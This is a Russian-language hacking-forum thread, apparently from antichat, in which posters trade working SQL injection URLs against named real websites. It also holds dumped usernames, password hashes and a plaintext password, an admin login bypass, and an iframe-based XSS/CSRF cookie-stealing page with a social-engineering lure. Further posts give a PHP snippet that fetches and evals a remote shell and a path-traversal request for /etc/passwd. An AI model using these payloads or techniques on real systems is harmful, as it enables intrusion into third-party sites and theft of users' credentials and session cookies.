если $сид пуста или $сид не равна $юсердата со значением $сесион_ид(если праильно понял $сесион_ид в таких скобках [] была)то показать ошибку на счет сесии как я писал где переменая $юсердата равна $ип и $логин,а $сесион_ид равна $ип,$автологин,$админ,$юсер_и д и еще 2словам без знака переменых это наверное значение из таблицы мускула!Кто подскажет обломавыется ли моя CSRF?Может я смогу подделать эту переменую сид.

Qam хз че ты написал чесно в пол третьего ночи тяжело думается, а поделу
SID ето тот идентификатор с которым ты лазишь по форумк послу того как успешно залогинился, он может связываться с твоим логином на сайте а может и с логином и пароль сразу , хранится в базе на серве до окончания сессии пока не пройдет определенное количество времени или ты не закроешь браузер,

если ты думаешь что тупо изменить СИД на другой СИд другого юзверя то такой вариант прокатит только если в кукисах не хранится твой зашифрованный пароль, и если СИД еще жив (тоесть жертва не закрыла браузер)

RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!

а как с такой таблы достать поля?
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+user+from+tk_users--

1.как узнать количество полей?

http://elitka.com.ua/view.php?id=381%27

2. и вот такая трабла
http://vitlen.com.ua/index.php?categoryID=128%20order%20by%201%20--
отбражает исходную
http://vitlen.com.ua/index.php?categoryID=128%20UNION%20SELECT%201%20--
вывод The used SELECT statements have a different number of columns

а как с такой таблы достать поля?
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит

за хекси Users а знак (=) замени на like

FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1

TELO
http://elitka.com.ua/cat.php?c=1+union+select+1,2,3,4,5,6--
5 ветка..

http://vitlen.com.ua/index.php?categoryID=-128+union+select+1--
так нету ошибки.. а при 1,2 есть...

за хекси Users а знак (=) замени на like

FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1

непрокатило
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM%20INFORMATION_ SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20LIKE=0x55736 57273%20LIMIT%200,1%20--

TELO
после like не = а +

* = используем когда непосредственно извлекаем где table_name=0x[table_hex]

TELO

5 ветка..


так нету ошибки.. а при 1,2 есть...

не там и не там нет вывода

TELO
после like не = а +

* = используем когда непосредственно извлекаем где table_name=0x[table_hex]
всё равно не выводит,ну да ладно....башка не варит уже
спс

[0]:admin:xyq5DSvOZhD.Y
[1]:sss:xyUQeQQ5IiRx2
[2]:lucas:xyb.sVOT03irU
[3]:dianer:xy2XsZs7GjaXM
что за хеши?

на des похоже

скорее всего DES(Unix)

всё равно не выводит,ну да ладно....башка не варит уже
спс

Конечно не выводит, это тебе не MYSQL, это PostgreSql. Почитай мануалы. Правильный запрос, чтобы посмотреть колонки, к примеру из таблы tk_users:

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM+INFORMATION_sC HEMA.COLUMNS+WHERE+TABLE_NAME=chr(116)||chr(107)|| chr(95)||chr(117)||chr(115)||chr(101)||chr(114)||c hr(115)+LIMIT+1+offset+0--

Вот тоже скуль
http://www.techcenter.com.ua/info3.php?id=17498%20order%20by%201%20--
а дальше не пойму..

Конечно не выводит, это тебе не MYSQL, это PostgreSql. Почитай мануалы уже. Правильный запрос, чтобы посмотреть колонки, к примеру из таблы tk_users:

http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM+INFORMATION_sC HEMA.COLUMNS+WHERE+TABLE_NAME=chr(116)||chr(107)|| chr(95)||chr(117)||chr(115)||chr(101)||chr(114)||c hr(115)+LIMIT+1+offset+0--
а имя таблы обязательно в чаре?

Да.

Вот тоже скуль
http://www.techcenter.com.ua/info3.php?id=17498%20order%20by%201%20--
а дальше не пойму..
Возможно в коде просто идет два запроса к БД подряд, по этому он и выдает The used SELECT statements have a different number of columns, попробуй использовать подзапросы

Парни,а мой вопрос утонул значит!Подскажите очень надо!

RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
возможно да, кинь кусок исходника, где генерируется sid, а то так сложно угадать

$userdata = session_pagestart($user_ip, PAGE_LOGIN);
init_userprefs($userdata);

if ($sid == '' || $sid != $userdata['session_id'])
{
message_die(GENERAL_ERROR, 'Invalid_session');
}

$session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);


Вот куски кода могу весь выложить если нужно!!

$userdata = session_pagestart($user_ip, PAGE_LOGIN);
init_userprefs($userdata);

if ($sid == '' || $sid != $userdata['session_id'])
{
message_die(GENERAL_ERROR, 'Invalid_session');
}

$session_id = session_begin($row['user_id'], $user_ip, PAGE_INDEX, FALSE, $autologin, $admin);


Вот куски кода могу весь выложить если нужно!!
по видимому тебе нужно знать IP пользователя и значение переменной $autologin для генерации сессии

Помогите с проблемой есть сайтик "_http://www.nb-torg.ru/"

CMS - CNStats 3.3

Нашел такие проблемки в нем:
XSS
http://www.nb-torg.ru/search/?search="><script>alert("error");</script>

и отсутствие фильтрации MySQL
http://www.nb-torg.ru/gd/-17

Что можно интересного придумать с SQL как разобрать если не сложно подскажите!

Заранее спасибо!

Чего ты вот это морочишься... Мысли глобально... Заходи в админку:

Логин: admin' OR 1=1#
Пароль любой...

Редирект не сработает, но если пораскинуть мозгами, можно тупо потом ввести:

http://www.nb-torg.ru/admin/main.php

вуаля - ты одмин

З.Ы. Я поражен, неужели это CMS?

Да, это не основная админка, но опять же - учитесь мыслить глобально... У вас уже есть доступ в админку первого уровня... Она бажная... Находим в ней инъекцию и раскручиваем:

http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION _SCHEMA.TABLES+LIMIT+X,1--

http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE _NAME),3,4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+ TABLE_NAME+LIKE+'%25admin%25'+LIMIT+X,1--

http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,TABLE_NAME,COLUMN_ NAME),3,4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+ TABLE_NAME='cns_users'+LIMIT+X,1--

http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5+FROM+INFORMATION _SCHEMA.TABLES+WHERE+TABLE_NAME+LIKE+'%25user%25'+ AND+TABLE_SCHEMA=DATABASE()+LIMIT+X,1--

http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,CONCAT_WS(0x3a,ID,NAME,PASSWORD,E MAIL,ICQ),3,4,5+FROM+frb_users+LIMIT+X,1--

Остальное уже разобрал:

http://www.nb-torg.ru/admin/adminers.php?action=edit&id=-1+UNION+SELECT+1,concat(login,char(58),password),3 ,4,5+FROM+db5971c.cns_users+limit+0,1--

Единственный косяк с пассом не могу понять

login: bolt
pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5

login: bolt
pass: *8BB679C6BFDA0D1AAFC77A05A7A01DBFF48F10A5
MySQL5

Да... Что-то интересное...

http://37-77.ru/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

Это как использовать???

есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...

safe mod on
magic quotes on
http include disabled

как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..

помогите +)

Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!

Заранее извеняюсь если такой вопрос здесь уже был,но я говорю честно гуглил!!!Вопщем есть на сайте пасивная хсс,могу ли я ее использовать в связке с CSRF?Тоесть я на уязвимом форуме кидаю урл на свой сайт в коде страницы которого ява скрипт суть этого скрипта в том чтобы он браузер жертвы отправлял на скрипт уявимый к хсс со всеми вытикающими!Технически это возможно?Еще раз извеняюсь если подобный вопрос уже был!Если что то не ясно спросил говорите!
технически возможно, но тебе нужно правильно составить запрос, который будет выполнятся от другого пользователя, при условии конечно если он в тот момент будет авторизован.

есть такой вопрос... есть скуля.. через нее заливаю в php но тут трабла... до смд так и не добрался...

safe mod on
magic quotes on
http include disabled

как можно обойти это? функции вида system exec passthru include copy move_uploaded_file fopen и тд не пашут! c file_get_contents не разобрался до конца..

помогите +)

тоесть ты свой php код можешь заливать на серв уже?

Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
<script>http://site.ru/bag.php?b=адрес_снифа</script>
вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!

попугай
да... долго думал.. очень)) вышло все намного проще.. вот поделюсь как я обошел сейф мод в моем случае... правда после заливки и так мало что можно зделать )
<? $f=file_get_contents("http://shell.txt");eval($f);?>
терь другой вопрос... как можно редактировать файл.. при сейфмоде.. нужны команды )

sabe

а средствами шелла не редактируется? Прав не хватает?

попугай
нет.. все функции отключены... токо eval пашет и ему спасибо)
могу лол токо unlink делать.. пока что остальные отключены сейфом... идеи? сайт того стоит)

ого, всмысле fopen, fwrite, file_put_contents - всё это отключено? ващее...

а fputs ?

Артем Солнце пасиб тебе за помощь!Так будет правильно в коде страниц:
<script>http://site.ru/bag.php?b=адрес_снифа</script>
вроде и все же!Иль вродь напутал!А если применить ни тэги <скрипт> а тэги картинки?Забыл в каких тэгах писать нужно!Подскажите если можете!
ты видимо недопонял, что такое CSRF.
CSRF это межсайтовая имитация запроса пользователя к стороннему сайту, если пользователь в это время авторизован на стороннем сайте. Т.е. если я правильно понял, то ты нашел XSS на форуме, и в связке XSS и CSRF ты можешь сделать следующее:

Допустим http://forum/bug-script.php?tipic=1 это ссылка бажного форума.
Ты нашел там XSS и ссылка с ним выглядит допустим так:
http://forum/bug-script.php?tipic=><script>alert(document.coockie)</script>
Вот. Но это палевный вариант сувать такую ссылку пользователям.
Теперь ты на своем сайте допустим hack2009.narod.ru размещаешь в index.html такой код:
<html>
<title>ERROR</title>
<body>
<b>ERROR</b>
<iframe style="width:0px; height:0px; border: 0px"
src="http://forum/bug-script.php?tipic=><script>КОД_ПЕРЕДАЧИ_СНИФЕРУ</script>"></iframe>
</body>
</html>
и пишешь на форуме в ЛС любому пользователю, мол "смотри тут преватное порно hack2009.narod.ru". Он переходит из ЛС на твой сайт и там выполняется CSRF+XSS. Куки твои. Молодец. Пять.

p.s. может где-то ошибся просто время уже 3:05 :( пиши сюда помогу чем могу

попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--

Не могу понять, нашел все таблицы, но ни в одну не пускает, может ктонить поможет?

В каком плане "не пускает"?

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_schema,table_n ame)+from+information_schema.columns+where+column_ name+like+char(112,97,115,115)+limit+0,1--
например достаем таблу с пассами..
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+adil soz.noc+limit+0,1--
осюда и вывод ;)

slava;1234Slava1

В каком плане "не пускает"?

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
у меня чето ошибку выдовала, хз почему, а эту таблицу ты как нарыл, через limit?

Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"

Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
Спасибо, большое! Все понял, а как часто вот так вот нужно к именам таблиц что-то добавлять, и как узнать что именно добавлять?

http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_name,table_sch ema)+from+information_schema.tables+limit+45,1--

table_name - имя таблицы
table_schema - бд, в которой таблица

В данном случае - ibf_cal_events:forum, значит запрос будет выглядеть:

from+froum.ibf_cal_events

Вот еще,
http://rabota.kz/candidates/vacancies.php?cat=123+order+by+2--
прекрассно видно что только два числа должны отображаться, а при вводе
http://rabota.kz/candidates/vacancies.php?cat=123+union+select+1,2--
выдает ошибку, объясните плз, где я ошибся? Заранее благодарен!

версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*

версия мускула = 3+ там нет union select
http://rabota.kz/candidates/vacancies.php?cat=123+/*!30000+union+select+1,2*//*
http://rabota.kz/candidates/vacancies.php?cat=123+/*!40000+union+select+1,2*//*
Ясненько, спасибо. Значит дальше рыть бесполезно?

Как работать с 3 веткой:

http://forum.antichat.ru/showpost.php?p=565034&postcount=4

Ну почему, блайнд sql фактически,

http://rabota.kz/candidates/vacancies.php?cat=-123+and+substring(@@version,1,1)=3

читай подпись, там есть

попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index


как? получилось?)

как? получилось?)
ребята подскажите кто-нить вот так выглядет сама сртpаничка

http://dwap.tj/chat/profile.php?id=1187&password=&ver=html

id=-1187&password=&ver=html

тут я ставлю минус между равно и 1187
и после как поставил минус выходит вот такая хринитень

Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 5 in /var/www/localhost/htdocs/dwap.tj/chat/profile.php on line 8
вопрос с могу я что-нить тут сделать,и как тут составить правильный запрос.

Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?

Что такое group_concat?
Разобрался. Длина возвращаемого значение GROUP_CONCAT ограничена переменной group_concat_max_len и обычно равна 1024. Поэтому и выбирается так мало данных...

про group_concat
http://webi.ru/webi_articles/8_14_f.html

Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?
попробуй
1) через limit 1,5 или 1,10
2) concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))

Gemini12, неа, не получается чиво-то (

Gemini12, неа, не получается чиво-то (
закинешь ссылку в пм? попробую, может че и выйдет...

2) group_ws(0x0a,group_concat(group_ws(0x3a,name,pass )))
Будь добр, объясни эту конструкцию, документация по мускулу ответов не даёт. :) Особенно интересна эта функция: group_ws

Будь добр, объясни эту конструкцию, документация по мускулу ответов не даёт. :) Особенно интересна эта функция: group_ws
я там ошибся, не group_ws а concat_ws ;)
ну а если и это интересно то:

concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))

concat_ws - выводит значения столбцов из таблиц, разделяя при этом точками, запятыми, двоеточиями, я в основном использую двоеточия, отсюда и "0x3a"; concat_ws(0x3a,name,pass) т.е. вывести name : pass

а group_concat - это чтобы лимитом мозги не е*ать, выводит все таблицы, но при этом по умолчанию стоит лимит 1024 символов, только админ может поменять значение? так что если не все таблицы показало, придется limit'ом добивать...

я там ошибся, не group_ws а concat_ws ну а если и это интересно то:
Я написал какая функция меня интересовала, но, даже так , мне очень интересно, зачем использовать concat_ws 2 раза?
concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))
Это какой-то новый подход? Что он даёт? Мне кажется, не нужно торопится, и давать ответы в которых сам не уверен

там два разных concat_ws 0x0a и 0x3a, думаю ты знаешь их значения, отсюда и вывод...

там два разных concat_ws 0x0a и 0x3a, думаю ты знаешь их значения, отсюда и вывод...Желание доказать свою правоту, порой мешает увидить ошибки, и улучшить знания.

Да я вижу, что ты составил конструкцию с двумя разными разделителями, но эта конструкция безсмысленна
concat_ws(0x0a,group_concat(concat_ws(0x3a,name,pa ss)))
Вынимаем поля, разделяем двоеточием, группируем и подаём в concat_ws 0x0a. Зачем? Что она по твоему будет разделять, если ей передаётся ОДИН аргумент.
Вобщем, это личное дело каждого. учиться или нет, но от написания безсмысленных конструкций(и доказывания, что так и надо) в разделе, прошу воздержаться, раздел по вопросам о уязвимостях, и ответы должны быть компетентными

Короче с тобой все ясно... Тебе сюда (http://forum.antichat.ru/threadnav46016-493-10.html)
И откуда только такие берутся, хз....

Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?

Так попробуй:

GROUP_CONCAT(name,0x3a,pass)+FROM+table+WHERE+ASCI I(lower(name))= 97 - это то же самое, все юзеры на 'a' (по идее если список всех юзеров не влезает, то может влезет список юзеров, начинающихся только на определённую букву, буквы можешь перебирать)

ну table замени на свою таблу есс-но

тебе пытаются объяснить что group_concat() будет однозначен.
насчет сабжа вариантов много, cамый очевидный:
select group_concat(user) from users where user>0xlast_selected_user
если колонки две +and pass>0xPass

/add первая строчка относится к Gemini12
/add2 Pashkela, а если в базе 10к юзверей на 'а'?)

/add2 Pashkela, а если в базе 10к юзверей на 'а'?)


есть еще substring, так что метода железная, если очень надо:)

ЗЫЖ И неоднократно проверенная, и легко автоматизируемая, сначала count(name), а потом уж сверять, сколько вывел, зачем и, самое главное, нафига

Хотя твой вариант тоже выглядит заманчиво, просто не проверял

Всем привет!

Вывожу информацию:
group_concat(name,0x3a,pass)
Но вывод информации ограничен, через лимит выводится гораздо больше.
Вопрос:
Как вывести всю информацию, без ограничений?

Если нужно выдернуть всех юзеров, а их очень много - использую прогу, для автоматизации процесса.
К примеру - тот же Сипт.

Всем, спасибо! получилось!

здравствуйте

http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2

Не выводит ничего!
Хотя запрос вида

http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?

мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!

kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)

да и запросы по разному пути
/school/view_cat.php и /view_cat.php

здравствуйте

http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name='user'+l imit+1,2

Не выводит ничего!
Хотя запрос вида

http://localhost/school/view_cat.php?cat=-1+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables
работатет и выводиться список всех таблиц,в чем моя ошибка?

мне посоветовали перевести в hex
Тогда такой вопрос?
Зачем ?Если скрипт написал я сам для практики и никакой фильтрации там нет!

Попробуй 'user' заменить на ('user')

BloodyMessage,спасибо огромное)обясни только в чем проблема была?в кодировке? =)

Попробуй 'user' заменить на ('user')
не работает :)

kevmen, видать ковычки фильтрует

BloodyMessage,база?
А разве база сама может фильтровать?
Извини,если вопрос глупый

Не могу нащупать скулю
http://www.hc.kz/index.php?action=showpart&part_id=-1'
Может кто поможет?

kevmen, а причем база? Скрипты то фильтруют.

Всем привет ) подскажите пожалуста , как вызвать ошибку в Phpbb 3 и выше , что бы узнать пусть сайта...
просбовал с 2х версий не выходит :(

2 BloodyMessage and kevmen
Уточняю, в большинстве подобных случаев никто никого не фильтрует...
Просто на сервере стоит magic_quotes=on, т.е. экранирование кавычек, засчет чего запрос к базе содержащий кавычки портится лишними слешами и поэтому результат запроса возвращает ошибку...
Доходчиво объяснил?

Gemini12, сделай такой скриптик:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>

и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?

kevmen, попробуй table_name='user' заменить на TABLE_NAME=CHAR(117,115,101,114)

да и запросы по разному пути
/school/view_cat.php и /view_cat.php
А можно поподробней? Где можно взять эту таблицу значений цифр?

Iceangel_,спасибо!Я до этого понять не мог,почему при вводе новостей содержащих кавычки происходило экранирование,благодарю за объяснение!=)

Gemini12,какая таблица значений еще?? :)
кодировщик-декодировщик
http://paulschou.com/tools/xlate/
ищи тут

Gemini12
закодировать в чар можно здесь
http://www.webfuture.ru/igo/convert.php

Gemini12, сделай такой скриптик:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
<title>FUCK</title>
<link href="/styles.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#008080">
<form action="http://www.hc.kz/admin/index.php" method="post">
Login: <input type="text" name="Username"><br />
Password: <input type="Password" name="Password"><br />
<input type="submit" value="Fuck admin">
</form>
</html>

и вбивай в поле "Логин":

' OR 1=@@VERSION--
' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables)--

Дальше разберёшься?
Чето не совсем понял куда этот скрипт девать :(
Не мог бы кинуть ссылочку на статейку про этот способ, или объясни ) заранее благодарен...

kevmen, а причем база? Скрипты то фильтруют.
я же написал скрип самописный и никакой фильтрации нет :)

Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--

Gemini12, создай у себя HTML файл с тем содержимым что я тебе написал...

Все! Понял! Благодарю!

Gemini12, чтобы обойти фильтр кавычек, в поле Логин вставляй преобразованные символьные строки:

' OR 1=(SELECT TOP 1 table_name FROM information_schema.tables WHERE table_name!=char(115)+char(104)+char(95)+char(99)+ char(117)+char(115)+char(116)+char(111)+char(109)+ char(101)+char(114)+char(115))--
А что зашифровал?

Ну ты же таблицы перебираешь? Выбрал таблицу с именем 'test' значит на следующий раз тебе нужно её отбросить, вот ты её таким образом шифруешь и пишешь в условии WHERE ... ... ... ... AND table_name!=CHAR(...)+CHAR(...)+CHAR(...)+CHAR(... ). Где в CHAR отдельные ASCII коды букв - t, e, s и t.

2 Gemini12:

на, не парься http://slil.ru/26575601

readme в комплекте, шифруй только имена таблиц, кавычки не шифруй

2 Gemini12:

на, не парься http://slil.ru/26575601

readme в комплекте, шифруй только имена таблиц, кавычки не шифруй
пароль помнишь?

Подскажите по Microsoft Database:
пишу
http://site.ru/index.php?newsid=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+MSysObjects)
выдает
Record(s) cannot be read; no read permission on 'MSysObjects'.
что можно сделать?

MSysObjects - системная табла. К ней довольно часто закрыт доступ.

Разочароваться можно (как вариант).

З.Ы. Прав нету у тебя читать оттуда.

MSysObjects - системная табла. К ней довольно часто закрыт доступ.
Это я уже понял ;)

Пробуй в ручную подобрать таблицы.

Пробуй в ручную подобрать таблицы.
Например? Я просто не так часто встречаюсь с MD...
в обычной скуле можно попробовать mysqlusers, users, admin и т.д. А тут что посоветйте прописать?

Насколько я понимаю, это Microsoft Access?
Тогда у тебя тот запрос вообще не правильно построен..
Вначале определяешь кол-во столбцов, с помощью order+by
Потом union+select+1,2,3...+from+таблица
Синтаксис запроса всегда должен содержать from+таблица, иначе вывода не увидешь.

Насколько я понимаю, это Microsoft Access?
Тогда у тебя тот запрос вообще не правильно построен..
Вначале определяешь кол-во столбцов, с помощью order+by
Потом union+select+1,2,3...+from+таблица
Синтаксис запроса всегда должен содержать from+таблица, иначе вывода не увидешь.
Не прет, насколько я помню Microsoft Access не понимает order by, или я ошибаюсь?
короче
http://www.aes.kz/site/news_sobyt_pod.asp?lng=1+or+1=1
направьте меня дальше, пригодится опыт с Microsoft Access.

опять Я)
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+table_name=0x757365 72+limit+1,2
или как тут мне подсказал BloodyMessage
http://localhost/view_cat.php?cat=-1+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.COLUMNS+where+TABLE_NAME=CHAR(117 ,115,101,114)+limit+1,2
данные запросы показали,что в базе в таблице user сущестуют столбцы User & Password
Пытаюсь выводить их следующим запросом:
http://localhost/view_cat.php?cat=-1+union+select+1,2,User,Password,5,6,7,8,9+from+us er+limit+1,1

Но,к сожалению,у меня ничего не выходит!Посоветуйте что-нибудь! :)

kevmen
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597

Попробуй почитать это, возможно многие вопросы отпадут

Gemini12

Ещё как понимает order+by, однако, по моему мнению - тут инъекцию не провести, хотя, может кто-нибудь и оспорит )

kevmen

Посмотри в какой бд лежит таблица.
Возможно там просто нету записей?

jokester,спасибо,но хотелось бы выяснить:на данный момент запрос составлен верно?

2 kevmen
может в табле всего 1 запись?
попробуй вот так...
http://localhost/view_cat.php?cat=-1+union+select+1,2,User,Password,5,6,7,8,9+from+us er+limit+0,1

Iceangel_,в таблице записей нет)вообще)
А запрос верно составлен?

Iceangel_,в таблице записей нет)вообще)
А запрос верно составлен?

Если 3 и 4 поля принтабельные - верно

пароль помнишь?

Ой, сорри, 123

<?php
function form(){
echo "<hr>";
echo "<form action=? method=GET>";
echo "Word:<input name=string type=text>";
echo "<input type=submit value=OK>";
echo "</form>";
}
if (!isset($_GET['string'])){
form();
exit;
}
$string=$_GET['string'];
for ($i=0;$i<strlen($string);$i++){
$str_arr[$i]=substr($string,$i,1);
}
$result='';
for ($i=0;$i<count($str_arr);$i++){
if ($i==count($str_arr)-1){
$result=$result.ord($str_arr[$i]);
}else{
$result=$result.ord($str_arr[$i]).",";
}
}
echo "<textarea>char(".$result.")</textarea>";
form();
?>
Вот, накатал быстро, если еще кому-то надо, энкодит слово в чар.

mailbrush, в разных диалектах SQL по разному применяется функция CHAR... Так же в разных диалектах по разному используется операция "конкатенация", поэтому возможно ещё варианты... Хорошо, если бы ты ещё предусмотрел переключатель - MySQL, MSSQL, Oracle... Цены бы тебе не было!

К чему ещё один "велосипед"?
К тому же, пару страниц назад Sabe скинул ссылку на сайт, который "энкодит слово в чар", причем можно энкодить как для MySQL, так и для MSSQL и Oracle.

Хорошо, если бы ты ещё предусмотрел переключатель - MySQL, MSSQL, Oracle... Цены бы тебе не было!
Посмотрим.. Это для мускуля было.

К тому же, пару страниц назад Sabe скинул ссылку на сайт, который "энкодит слово в чар", причем можно энкодить как для MySQL, так и для MSSQL и Oracle.
Это гуд, не искал, знач мну писать не надо, но для себя потренируюсь.

идиотством страдаю,пока на все 100% не закреплю ,дальше не пойду)
http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+column_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1
Точно знаю, что в таблице есть строки
addedrequests-название таблицы

но выводит,что запрос прошел,однако данных нет!

kevmen А может всё-же почитать что-то нужно? Статьи ведь пишут не для того, что-бы сдесь их по новой всем индивидуально перессказывать


http://localhost/view_cat.php?cat=-1+union+select+1,column_name,3,4,5,6,7,8,9+from+in formation_schema.columns+where+column_name=char(97 ,100,100,101,100,114,101,113,117,101,115,116,115)+ limit+1,1

Столбец, из шемы, где столбец. Видимо ты хотел написать, +where+table_name='имя_таблицы'

jokester
ЧитаЛ
Читаю вот
https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
и вот
http://forum.antichat.ru/thread43966.html

kevmen
